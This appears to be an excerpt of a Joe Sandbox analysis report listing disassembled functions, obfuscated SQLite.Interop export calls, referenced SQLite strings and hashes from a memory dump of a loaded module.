                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Id95bb14c42234d8e.$I8b0d9e6837e61abc.$I28687b581b626bbf.I94ecb64e9dbb8338.Ie969e8d8137a8a33.Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1281124493-0
                                                                                                                                                                                                                                      • Opcode ID: 3cc068d63bd3bf2a5795545ef3e4878e30177bdd7ee0a17e2e8eba46ccdc44a5
                                                                                                                                                                                                                                      • Instruction ID: 666c1e6ec84cf443841d02d4505947c2529c70a5f841fc30a8b36d250df99444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3cc068d63bd3bf2a5795545ef3e4878e30177bdd7ee0a17e2e8eba46ccdc44a5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42519DB8D11209DFCB04DFA4E8859EEBBB1BF49308F204469D841A7340F739AB15DBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00005AFD,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC564CB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC564C4
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC564B5
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC564BF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-160653349
                                                                                                                                                                                                                                      • Opcode ID: dc8dee6d3afb0818b21268ad86f8b2c5e6a87f67536f2d4ee5a659f8f5146d79
                                                                                                                                                                                                                                      • Instruction ID: 79860dc2670f36af5bb93be1db4e4cb14c06636d6b0ecf09b65ec323c164f3da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc8dee6d3afb0818b21268ad86f8b2c5e6a87f67536f2d4ee5a659f8f5146d79
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FED125B1A15B02DFD714CF24D48075AB7B0BF84319F008A69E8698B341E739FA75CB96
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,?,?,6BC5B9AD,?), ref: 6BC577A2
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD42,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC577C0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unknown error
                                                                                                                                                                                                                                      • API String ID: 2981141233-2151920856
                                                                                                                                                                                                                                      • Opcode ID: abd1eca6b57049043e2fdd16dadad14e4ae53a3881d688990593782e0cd33afb
                                                                                                                                                                                                                                      • Instruction ID: e45dbee730facbf66e1b389fad02ab246fac28301d9f663566f49d562e7164c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abd1eca6b57049043e2fdd16dadad14e4ae53a3881d688990593782e0cd33afb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23213A736552000BEA164B68A801B9777D5DB40275F04407BE959AF641FA3CEA71C3F9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,?,6BC8B55D,00000001), ref: 6BC87029
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002A7E4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC87047
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC87040
                                                                                                                                                                                                                                      • unable to close due to unfinalized statements or unfinished backups, xrefs: 6BC870A8
                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6BC87022
                                                                                                                                                                                                                                      • invalid, xrefs: 6BC8701D
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC87031
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC8703B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                      • API String ID: 2981141233-354973669
                                                                                                                                                                                                                                      • Opcode ID: 4599a3f35b642a82f185dd30499b46fde8746dbdc44c0a1db31170b5994fd4b0
                                                                                                                                                                                                                                      • Instruction ID: ed0a4603a4f9c6d38bd72faffb075a35222ce94fb2d94d631e4ac71fe5f5b56d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4599a3f35b642a82f185dd30499b46fde8746dbdc44c0a1db31170b5994fd4b0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96110631765B2427E62057786C06F9B7B854F0172DF040066F99DEF282FB1DD60593E6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIfc4b758a3d39aef3.SQLITE.INTEROP(?,?,?,?,?), ref: 6BC501C4
                                                                                                                                                                                                                                      • SI25d73a5ab4d6cacb.SQLITE.INTEROP ref: 6BC50208
                                                                                                                                                                                                                                      • SI25d73a5ab4d6cacb.SQLITE.INTEROP ref: 6BC50233
                                                                                                                                                                                                                                      • SI30455e90830ca460.SQLITE.INTEROP(?,?), ref: 6BC502B1
                                                                                                                                                                                                                                      • SI558bdfe0e27562ea.SQLITE.INTEROP(?,?), ref: 6BC502D3
                                                                                                                                                                                                                                      • SIfc4b758a3d39aef3.SQLITE.INTEROP(?,?,?,?,?,?,?,?,?), ref: 6BC50574
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I25d73a5ab4d6cacb.Ifc4b758a3d39aef3.$I30455e90830ca460.I558bdfe0e27562ea.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823083451-0
                                                                                                                                                                                                                                      • Opcode ID: f337a301699776b70748a8855339026d76aced7a188e6aa1ac728b155207a997
                                                                                                                                                                                                                                      • Instruction ID: 837985efbdd0106d72bed5936b4ef35c30cfcfb2dbb92e34b4b32462bb398bf5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f337a301699776b70748a8855339026d76aced7a188e6aa1ac728b155207a997
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAF1D7B29193518FD700CF24C89161ABBE5BFC5308F08859DF899D7311E378DA65CBA6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000,?,?,00000000,00000001,?,?), ref: 6BC19018
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC1907D
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC1908A
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC190A1
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC190AE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 372259789-0
                                                                                                                                                                                                                                      • Opcode ID: 2bb9f44a64483f8af95760f66b6abcb95f75055d181a89fe7af7643c6c352ce0
                                                                                                                                                                                                                                      • Instruction ID: b89a9df780aa090a20be75248ea92662100f5e81bdb50d8d30020bb00fbcbf3e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bb9f44a64483f8af95760f66b6abcb95f75055d181a89fe7af7643c6c352ce0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE8191B1919311AFD300CF68D84195BF7E8BF89718F00862EF848A3201F779E6568BD2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                                                      • String ID: DELETE$Expression tree is too large (maximum depth %d)$ORDER BY without LIMIT on %s
                                                                                                                                                                                                                                      • API String ID: 2102423945-20366875
                                                                                                                                                                                                                                      • Opcode ID: 03d8ed82f7f1fb26ef551f70e63500fc36df010d130c904e5831b8b8723ff49b
                                                                                                                                                                                                                                      • Instruction ID: d3babb1fc38f271dc2b416de74bd4b9583c4cb7971ba93978f04172ee539f6dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03d8ed82f7f1fb26ef551f70e63500fc36df010d130c904e5831b8b8723ff49b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75C1C070A25710ABC320DF28CC81B1B73E4EF95714F140668F9599B392E7B9EA45CBD2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIdb45e174afb28e2c.SQLITE.INTEROP(SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END),?,?,?,?), ref: 6BCCB33B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • AND , xrefs: 6BCCB56B
                                                                                                                                                                                                                                      • WHERE , xrefs: 6BCCB3DC
                                                                                                                                                                                                                                      • IS ?, xrefs: 6BCCB4D2
                                                                                                                                                                                                                                      • sqlite_stat1, xrefs: 6BCCB319
                                                                                                                                                                                                                                      • SELECT * FROM , xrefs: 6BCCB382
                                                                                                                                                                                                                                      • SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END), xrefs: 6BCCB336
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idb45e174afb28e2c.
                                                                                                                                                                                                                                      • String ID: AND $ IS ?$ WHERE $SELECT * FROM $SELECT tbl, ?2, stat FROM %Q.sqlite_stat1 WHERE tbl IS ?1 AND idx IS (CASE WHEN ?2=X'' THEN NULL ELSE ?2 END)$sqlite_stat1
                                                                                                                                                                                                                                      • API String ID: 778684903-197720640
                                                                                                                                                                                                                                      • Opcode ID: b8efc795acfb24e57d97d0f677e26d79890a27c15cf1e4b2d0fbd46909fef317
                                                                                                                                                                                                                                      • Instruction ID: 4f1ffeb5dbc4463c7c0b8d31ba47c727ad602c95ca6d92925b42b5cbb803087a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8efc795acfb24e57d97d0f677e26d79890a27c15cf1e4b2d0fbd46909fef317
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5EA1A1B19183059FD300CF64D881A5BB7E5AFD9318F44896DF99897341F738DA098BA3
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC458C2
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6BC4598A
                                                                                                                                                                                                                                      • SIdace78b5300c999f.SQLITE.INTEROP(?), ref: 6BC45A10
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Idace78b5300c999f.Iffb8076c269e2a85.__aulldiv
                                                                                                                                                                                                                                      • String ID: %llu$%llu$%llu
                                                                                                                                                                                                                                      • API String ID: 1680873459-507185057
                                                                                                                                                                                                                                      • Opcode ID: ef45ce7d884ff11047fc5a5533bd7d87025653f65612eb2e669c1a341db5485f
                                                                                                                                                                                                                                      • Instruction ID: 5371a5d382f7bcb36f27fb300dd55ce95127868089c32cb53b2fda7657636060
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef45ce7d884ff11047fc5a5533bd7d87025653f65612eb2e669c1a341db5485f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3391D271A24211AFC700CF28D88196BB7E8FF88718F40495EF99587251E735EB59CBE2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8c5d6a3d79dd16ae.SQLITE.INTEROP(?,00000001,00000000,00000000), ref: 6BC648AA
                                                                                                                                                                                                                                      • SI952d22c6db518ea2.SQLITE.INTEROP(?,00000001,?,?,?,?,?,?), ref: 6BC64924
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,00015BE4,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC64A7F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC64A78
                                                                                                                                                                                                                                      • (, xrefs: 6BC64B08
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC64A69
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC64A73
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.I8c5d6a3d79dd16ae.I952d22c6db518ea2.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$($fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
                                                                                                                                                                                                                                      • API String ID: 747483182-3128250811
                                                                                                                                                                                                                                      • Opcode ID: 0ed8cabd9f729c0f886209e0e342b8eb7a095feeffddd65ece9e9b12b0eecf14
                                                                                                                                                                                                                                      • Instruction ID: 6263a217796a0045c2cb554b92ca4b855626018aed21bf1a0357374fb21d8548
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ed8cabd9f729c0f886209e0e342b8eb7a095feeffddd65ece9e9b12b0eecf14
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1A13B70A186615FD710CF29C8D0A6ABBE1BFC5755F044699F8A48B342F73CDA05CBA1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?), ref: 6BC2454F
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC24558
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.
                                                                                                                                                                                                                                      • String ID: remove_diacritics=0$remove_diacritics=1$remove_diacritics=2$separators=$tokenchars=
                                                                                                                                                                                                                                      • API String ID: 372259789-131617836
                                                                                                                                                                                                                                      • Opcode ID: 79f8825b62258fca002d40d1a51b6341f82fada8dccf0b8d222715cdd83867bd
                                                                                                                                                                                                                                      • Instruction ID: 8ed432358a54dad04055a3109ad2a4ca93fbfdaf5ca34e64666abdc20d58e03a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 79f8825b62258fca002d40d1a51b6341f82fada8dccf0b8d222715cdd83867bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B71F771E1D1804BD7118F28C460756FFB2AB82328F5D86E8D6D94F342F73AEA468791
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC48336
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(?,?,000000FF), ref: 6BC48438
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC48441
                                                                                                                                                                                                                                      • SI1bf8975e567ea97a.SQLITE.INTEROP(?), ref: 6BC48454
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC48461
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC4846E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
